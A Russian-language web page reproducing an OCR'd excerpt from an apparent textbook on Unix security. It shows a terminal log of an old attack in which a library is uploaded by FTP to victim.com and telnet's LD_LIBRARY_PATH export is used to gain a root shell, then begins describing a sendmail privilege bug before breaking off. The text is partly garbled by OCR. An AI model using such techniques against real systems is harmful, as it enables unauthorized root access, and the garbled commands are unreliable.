Главная Случайная страница Контакты | Мы поможем в написании вашей работы! | ||
|
Remote system type is UNIX.
Using binary mode to transfer files.
ftp" cd incoming
CWD command successful.
ftp" send libc. so. 4
PORT command successful.
Opening BINARY mode data connection for libc.so.4 226 Transfer
Complete.
ftp" bye
Goodbye.
evil:'# telnet
telnet" env define LD_LIBRARY_PATH /home/ftp/incoming telnet" env export
LD_LIBRARY_PATH
telnet" open victim.com
Trying 194.94.94.94...
Connected to victim.com.
Escape character is ' "]'.
Linux 1.2. 13 (victim, coin) (ttypO) Victim login: hacker
Password:
bashff cd /root
Снова sendmaH
В этом разделе мы рассмотрим две уязвимости в программе sendmail новых
Версий Очевидно, что одна из основных функций sendmail - это SMTP-демон,
Отвечающий на входящие письма. Только суперпользователь может запустить ее
В таком режиме, и это проверяется специальной процедурой самой sendmail.
Однако из-за ошибки кодирования sendmail может быть запущена в режиме
Демона так, что проверка будет пропущена. Более того, начиная с версии
Sendmail перезапустит сама себя, если получит сигнал SIGHUP с помощью
Системного вызова ехес(2), после чего она начнет исполняться с
Привилегиями суперпользователя. В этот момент, манипулируя переменными
Дата публикования: 2014-11-04; Прочитано: 273 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!